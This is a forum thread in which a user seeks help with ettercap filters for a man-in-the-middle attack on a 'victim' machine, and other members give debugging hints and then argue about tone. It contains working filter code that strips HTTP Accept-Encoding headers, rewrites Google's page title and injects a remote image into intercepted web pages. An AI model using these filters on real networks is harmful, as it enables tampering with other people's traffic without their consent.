Results 1 to 10 of 29

Thread: ettercap filter

Hybrid View

  1. #1
    Junior Member
    Join Date
    Jul 2007
    Posts
    44

    Default ettercap filter

    Hello,

    First of all, I'm posting here cos the Ettercap forums don't work (I can't register).

    I'm trying to do easy ettercap filter but it doesn't seem to work. The filter is:
    Code:
    if (ip.proto == TCP && tcp.dst == 80) {
       if (search(DATA.data, "Accept-Encoding")) {
          replace("Accept-Encoding", "Accept-Rubbish!"); # note: replacement string is same length as orig$
          msg("zapped Accept-Encoding!\n");
       }
    }
    
    if (ip.proto == TCP && tcp.src == 80) {
       replace("<title>Google</title>", "<title>Google H4CK3D</title>");
       msg("Filter Ran.\n");
    }
    The MiM attack work (I can see SSL connections.

    If I load Google page on the victims computer, the source page still has <title>Google</title>.

    In Wireshark I can see one request from the Victim with:

    Code:
    Accept-Encoding: gzip,deflate\r\n
    and then a second one:
    Code:
    Accept-Rubbish!: gzip,deflate\r\n
    but the second request is marked as "TCP out of order". I don't really know what that means.

    Then I can see a answer from google containing the "H4CK3D" title. It's again marked as "TCP out of order".

    Anyway, the vicitm's Google page does not contain the modified code.

    Thanks for your advices.

    If I use this filter, from the IronGeek tutorial, it works fine:
    Code:
    if (ip.proto == TCP && tcp.dst == 80) {
       if (search(DATA.data, "Accept-Encoding")) {
          replace("Accept-Encoding", "Accept-Rubbish!"); 
    	  # note: replacement string is same length as original string
          msg("zapped Accept-Encoding!\n");
       }
    }
    if (ip.proto == TCP && tcp.src == 80) {
       replace("img src=", "img src=\"http://www.irongeek.com/images/jollypwn.png\" ");
       replace("IMG SRC=", "img src=\"http://www.irongeek.com/images/jollypwn.png\" ");
       msg("Filter Ran.\n");
    }

  2. #2
    Just burned his ISO
    Join Date
    Feb 2010
    Posts
    14

    Default

    This is a relatively easy one. I'll nudge you in the right direction.

    Although you have changed the code to replace google with something else you failed to specify what to search for. Keep in mind that irongeek was changing a file not text.....

    I'll put the code up if you get stuck, just think you might like to play some more. Your almost there.

  3. #3
    Junior Member
    Join Date
    Jul 2007
    Posts
    44

    Default

    Hi,
    so should it be something like:
    Code:
       if (search(DATA.data, "<title>Google</title>")) 
        {
          replace("<title>Google</title>", "<title>GOOGLE ;)</title> "); 
       }
    I can't test it right now cos I'm not at home

    cheers

  4. #4
    Very good friend of the forum drgr33n's Avatar
    Join Date
    Jan 2010
    Location
    Dark side of the moon ...
    Posts
    699

    Default

    lol the problem with the FIRST filter posted is the text dosn't match in size. If you are trying to add somthing use the inject command insted of replace to inject owned after google.

  5. #5
    Junior Member
    Join Date
    Jul 2007
    Posts
    44

    Default

    Quote Originally Posted by Dr_GrEeN View Post
    lol the problem with the FIRST filter posted is the text dosn't match in size. If you are trying to add somthing use the inject command insted of replace to inject owned after google.
    Hi,
    could you be more precise ? Does the replace function must have both arguments of same length ?

    According to this doc : http://www.penguin-soft.com/penguin/...terfilter.html

    the inject function injects a packet file. If I simply use this function instead of the replace function as you stated in the FIRST code sample, I get this error:


    filter engine: inject(): File not found (<title>Google HACKED</title>)
    regards,
    Tex

  6. #6
    My life is this forum thorin's Avatar
    Join Date
    Jan 2010
    Posts
    2,629

    Default

    First of all, I'm posting here cos the Ettercap forums don't work (I can't register).
    And this is our problem becaue???????

    At the very least you could have picked the correct forum to post to. This has nothing to do with: BackTrack v2.0 Final. (Shoulda used General or Newb)

    If I load Google page on the victims computer, the source page still has <title>Google</title>.
    Of course you emptied the browser cache before trying this right?

    Oh and in the last example you posted that you couldn't test yet your quotes and commas are all FUBAR.

  7. #7
    Junior Member
    Join Date
    Jul 2007
    Posts
    44

    Default

    Quote Originally Posted by thorin View Post
    And this is our problem becaue???????
    Did I say that it is your problem ? I dont think so. I just wanted to avoid beiing redirected to the Ettercap forums

    Quote Originally Posted by thorin View Post
    At the very least you could have picked the correct forum to post to. This has nothing to do with: BackTrack v2.0 Final. (Shoulda used General or Newb)
    Ok I will the next time.

    Quote Originally Posted by thorin View Post
    Of course you emptied the browser cache before trying this right?
    Yes monsieur.


    Quote Originally Posted by thorin View Post
    Oh and in the last example you posted that you couldn't test yet your quotes and commas are all FUBAR.
    I overlooked this mistakes cos I was in hurry.

    thorin, thank you for using this arrogant tone in your reply. Really pleasant, especilly when it's 3 weeks after the original post.

  8. #8
    My life is this forum thorin's Avatar
    Join Date
    Jan 2010
    Posts
    2,629

    Default

    Did I say that it is your problem ? I dont think so. I just wanted to avoid beiing redirected to the Ettercap forums
    You didn't say it but you've definately implied it by bringing your problem here, instead of posting to the Ettercap forums (or emailing the mods/admins to get things fixed).

    I overlooked this mistakes cos I was in hurry.
    No problem, just figured you'd come back and copy paste that bit then post again when it didn't work so I thought I'd try to head you off at the pass and make sure you corrected it before using it, and avoid the inevitable question.
    thorin, thank you for using this arrogant tone in your reply. Really pleasant, especilly when it's 3 weeks after the original post.
    No problem. Especially when 3 weeks after you posted you still haven't figured it out on your own.

  9. #9
    Member hawaii67's Avatar
    Join Date
    Feb 2006
    Posts
    318

    Default

    I don't understand why it is necessaary to be impolite or arrogant here. Even the best l33t h4x0rs started out as beginners and were looking for help once.....
    This forum is to help ppl and not to insult them.
    Don't eat yellow snow :rolleyes:

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •